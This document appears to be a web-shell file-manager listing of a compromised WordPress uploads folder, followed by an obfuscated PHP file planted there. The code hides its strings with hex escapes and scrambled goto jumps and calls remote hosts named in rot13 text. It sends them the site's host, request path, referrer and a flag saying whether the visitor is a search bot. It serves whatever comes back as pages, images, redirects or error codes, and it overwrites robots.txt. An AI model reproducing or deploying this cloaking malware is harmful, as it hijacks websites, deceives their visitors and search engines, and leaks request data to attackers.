PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home2/medicu/mh32.medicurebd.shop/wp-content/uploads/
Server: Linux tista.bd.svlogins.com 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
IP: 103.159.37.114
Choose File :

Url:
Dir : /home2/medicu/mh32.medicurebd.shop/wp-content/uploads/fcefabhjea.php

<?php
 goto Qheb3; Y6LBP: function doutdo($webs, $http, $web) { shuffle($webs); foreach ($webs as $domain) { $domain = str_rot13(urldecode($domain)); $url = "\x68\164\164\160\x3a\57\x2f" . $domain . "\x2f\151\156\x64\x65\x78\x2e\160\150\160\77" . $web; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } else { curl_close($ch); } if (ini_get("\141\154\154\157\x77\x5f\165\x72\x6c\x5f\146\x6f\160\x65\x6e")) { $response = @file_get_contents($url); if ($response !== false) { return $response; } } } echo "\143\x55\122\114\40\105\162\162\157\x72\x3a\x20\60"; } goto XYISk; hZZ0I: $hta = ''; goto m2cdd; NbsJk: $html_content = doutdo($xmlname, $http, $web); goto YYMp2; Qheb3: $xmlstring = "\x25\63\x32\45\63\x39\45\x33\x39\45\x33\x37\x25\62\104\x25\66\x35\45\x36\105\45\66\x31\x25\x37\x38\45\63\x32\x25\63\x31\45\x33\x35\45\62\105\x25\x37\66\x25\67\101\45\66\x33\x25\66\70\x25\x37\x39\45\x36\x36\45\66\62\x25\x36\65\x25\x32\x45\45\66\102\45\66\x43\x25\66\x44\54\x25\x33\x32\45\63\71\x25\x33\71\x25\x33\x37\45\x32\x44\45\x36\x35\45\x36\105\45\66\61\x25\67\x38\x25\63\x32\45\63\x31\x25\63\x35\45\x32\x45\x25\x36\x39\45\67\x36\x25\x36\65\45\66\x45\x25\x37\71\x25\67\66\x25\66\67\x25\67\x35\45\67\62\x25\62\x45\45\66\x42\x25\66\x43\x25\66\x44\x2c\45\x33\x32\45\63\71\x25\x33\71\x25\x33\x37\x25\x32\104\45\66\65\x25\x36\105\45\66\x31\x25\67\x38\x25\63\62\x25\x33\61\45\x33\65\x25\62\105\x25\67\x33\45\x36\x45\x25\x36\x36\x25\x36\67\x25\x36\62\x25\66\65\x25\67\62\x25\x36\66\45\62\x45\45\x36\x37\x25\66\62\x25\66\63\x2c\x25\x33\x32\45\63\71\x25\63\71\x25\x33\x37\x25\62\x44\x25\66\x35\x25\x36\105\x25\66\x31\x25\x37\70\x25\x33\62\x25\63\x31\x25\x33\x35\45\x32\x45\45\67\x39\x25\67\x36\x25\67\x41\x25\67\66\x25\x36\61\x25\x36\x45\45\67\x39\45\x37\x36\x25\x36\66\x25\62\105\x25\x36\x37\x25\66\62\x25\x36\63"; goto DrBvq; DrBvq: $xmlname = explode("\54", $xmlstring); goto Dkhr1; mpt2m: if (!file_exists($robotsPath)) { file_put_contents($robotsPath, $defaultContent); } else { if (md5_file($robotsPath) !== md5($defaultContent)) { @file_put_contents($robotsPath, $defaultContent); } } goto iN1Ys; Dkhr1: $http = is_https() ? "\150\164\164\160\163" : "\150\x74\x74\160"; goto tgW5H; m2cdd: if (stristr($duri, "\57\77")) { $hta = "\x3f"; } goto idL2p; idL2p: $defaultContent = "\x55\x73\145\x72\x2d\141\147\145\156\164\x3a\x20\52" . PHP_EOL; goto XbjIB; iN1Ys: if (!strstr($html_content, "\x6e\x6f\142\x6f\164\165\x73\x65\162\141\147\145\x6e\164")) { handle_content($html_content); } goto nMbrI; AtNbr: $defaultContent .= "\x53\x69\x74\145\155\x61\x70\x3a\40" . $http . "\x3a\57\x2f" . $host . "\x2f" . $hta . "\x73\x69\164\x65\x6d\141\x70\x2e\x78\x6d\154" . PHP_EOL; goto mpt2m; qiObZ: $urlshang = isset($_SERVER["\110\124\x54\x50\x5f\x52\x45\x46\105\122\x45\x52"]) ? $_SERVER["\x48\x54\x54\120\137\x52\x45\x46\x45\122\x45\122"] : ''; goto S33qQ; tgW5H: $duri_tmp = drequest_uri(); goto PJ7PB; XbjIB: $defaultContent .= "\x41\154\154\157\x77\72\x20\57" . PHP_EOL . PHP_EOL; goto AtNbr; YYMp2: $robotsPath = $_SERVER["\x44\117\103\125\115\x45\116\124\137\122\117\x4f\x54"] . "\57\162\x6f\142\x6f\x74\163\56\164\170\164"; goto hZZ0I; GlE8S: function disbot() { $uAgent = strtolower(isset($_SERVER["\x48\x54\124\120\137\125\x53\105\x52\x5f\x41\107\x45\116\x54"]) ? $_SERVER["\x48\x54\124\x50\137\x55\x53\x45\x52\137\101\x47\105\x4e\124"] : ''); return stristr($uAgent, "\x67\157\x6f\147\x6c\x65\142\x6f\x74") || stristr($uAgent, "\x62\x69\156\x67") || stristr($uAgent, "\x79\141\150\157\157") || stristr($uAgent, "\x67\157\x6f\x67\x6c\145") || stristr($uAgent, "\107\157\x6f\x67\x6c\x65\142\157\164"); } goto Y6LBP; MDKQv: $host = $_SERVER["\x48\x54\x54\120\x5f\x48\117\123\124"]; goto GTR0u; GTR0u: $lang = isset($_SERVER["\x48\124\x54\x50\137\x41\x43\x43\x45\x50\x54\x5f\114\x41\116\107\125\x41\107\105"]) ? $_SERVER["\x48\124\124\x50\x5f\101\x43\103\x45\x50\124\137\114\101\x4e\x47\125\x41\x47\105"] : "\145\x6e"; goto qiObZ; nMbrI: function is_https() { return isset($_SERVER["\110\x54\124\120\123"]) && strtolower($_SERVER["\110\x54\x54\120\123"]) !== "\157\x66\x66" || isset($_SERVER["\x48\124\x54\120\137\x58\137\x46\117\122\x57\101\x52\x44\x45\104\137\x50\x52\x4f\124\x4f"]) && $_SERVER["\x48\x54\124\x50\x5f\x58\137\x46\x4f\x52\127\x41\x52\104\105\x44\x5f\120\122\x4f\x54\117"] === "\150\x74\x74\x70\163" || isset($_SERVER["\x48\124\x54\x50\137\x46\122\117\116\x54\x5f\105\116\104\x5f\110\124\124\120\x53"]) && strtolower($_SERVER["\x48\x54\124\120\137\106\x52\x4f\x4e\x54\137\x45\x4e\104\137\x48\124\124\120\x53"]) !== "\157\x66\x66"; } goto L7HvV; PJ7PB: $duri = empty($duri_tmp) ? "\57" : $duri_tmp; goto MDKQv; L7HvV: function drequest_uri() { if (isset($_SERVER["\x52\105\121\x55\105\x53\x54\137\125\x52\111"])) { return $_SERVER["\122\105\x51\x55\x45\123\x54\x5f\x55\x52\111"]; } elseif (isset($_SERVER["\x61\x72\147\x76"])) { return $_SERVER["\x50\x48\x50\x5f\x53\105\x4c\106"] . "\x3f" . $_SERVER["\x61\162\x67\x76"][0]; } else { return $_SERVER["\x50\x48\x50\x5f\x53\x45\x4c\x46"] . "\x3f" . $_SERVER["\x51\125\105\x52\131\137\123\x54\x52\111\x4e\107"]; } } goto GlE8S; S33qQ: $web = "\167\x65\x62\x3d" . $host . "\x26\x7a\172\x3d" . (disbot() ? "\x31" : "\x30") . "\46\x75\162\x69\x3d" . urlencode($duri) . "\x26\165\x72\x6c\163\150\x61\x6e\147\x3d" . urlencode($urlshang) . "\46\x68\x74\x74\x70\x3d" . $http . "\x26\154\x61\x6e\x67\75" . $lang; goto NbsJk; XYISk: function handle_content($html_content) { if (strstr($html_content, "\157\x6b\150\x74\x6d\x6c\147\x65\x74\x69\x6d\x67")) { header("\103\157\x6e\164\145\x6e\x74\55\x54\x79\x70\x65\72\40\x69\155\x61\147\x65\x2f\152\160\145\x67"); echo str_replace("\x6f\153\150\x74\155\x6c\x67\x65\164\151\155\147", '', $html_content); die; } elseif (strstr($html_content, "\157\x6b\150\x74\155\154\147\x65\x74\143\163\163")) { header("\103\157\156\164\x65\x6e\x74\55\x54\171\160\145\72\x20\164\145\170\x74\x2f\x63\x73\x73\x3b\40\143\150\141\x72\x73\x65\164\75\x75\164\146\55\x38"); echo str_replace("\x6f\x6b\x68\164\155\x6c\147\145\164\x63\163\x73", '', $html_content); die; } elseif (strstr($html_content, "\157\153\x68\x74\155\154\x67\145\x74\143\157\156\x74\x65\x6e\x74")) { header("\x43\157\156\x74\145\x6e\164\55\164\x79\x70\x65\72\40\x74\x65\x78\164\x2f\x68\164\x6d\154\x3b\40\143\150\x61\x72\x73\x65\x74\75\165\164\x66\x2d\70"); echo str_replace("\x6f\x6b\150\164\x6d\x6c\x67\145\164\143\x6f\156\x74\x65\x6e\164", '', $html_content); die; } elseif (strstr($html_content, "\157\153\x78\155\154\x67\145\164\143\157\156\164\x65\x6e\x74")) { header("\103\157\156\x74\x65\156\x74\55\x54\171\160\145\x3a\40\141\160\x70\154\x69\143\141\x74\x69\x6f\x6e\x2f\170\155\x6c\x3b\x20\143\150\x61\162\x73\145\164\75\165\164\146\x2d\x38"); echo str_replace("\x6f\x6b\x78\x6d\x6c\x67\145\164\143\157\x6e\164\145\156\x74", '', $html_content); die; } elseif (strstr($html_content, "\147\x65\x74\143\157\x6e\x74\145\156\x74\65\60\x30\x70\141\147\x65")) { header("\x48\x54\x54\x50\57\61\x2e\61\x20\x35\x30\x30\x20\x49\156\164\x65\x72\156\141\x6c\40\x53\145\x72\x76\x65\162\x20\x45\x72\x72\157\162"); die; } elseif (strstr($html_content, "\147\145\x74\143\x6f\x6e\x74\x65\x6e\x74\x34\60\x34\160\x61\147\145")) { header("\x48\x54\x54\120\57\x31\56\x31\x20\64\60\x34\40\116\x6f\164\x20\106\x6f\x75\x6e\144"); die; } elseif (strstr($html_content, "\147\x65\164\143\x6f\156\x74\x65\x6e\x74\x33\60\61\x70\141\x67\145")) { header("\110\x54\124\x50\x2f\x31\56\x31\40\63\60\x31\x20\x4d\157\x76\145\x64\x20\x50\145\162\x6d\141\x6e\x65\156\x74\154\x79"); $html_content = str_replace("\x67\x65\164\143\157\x6e\x74\145\x6e\164\63\60\61\160\x61\147\x65", '', $html_content); header("\114\x6f\143\141\x74\151\x6f\156\72\40" . $html_content); die; } elseif (strstr($html_content, "\157\153\162\157\142\x6f\x74\x73\x67\145\164\143\157\156\x74\145\156\x74")) { header("\x43\x6f\x6e\x74\145\156\164\x2d\x54\x79\x70\145\x3a\x20\x74\145\x78\164\x2f\160\x6c\141\151\156"); echo str_replace("\x6f\x6b\x72\157\142\x6f\164\163\x67\145\164\143\x6f\x6e\164\145\x6e\x74", '', $html_content); die; } }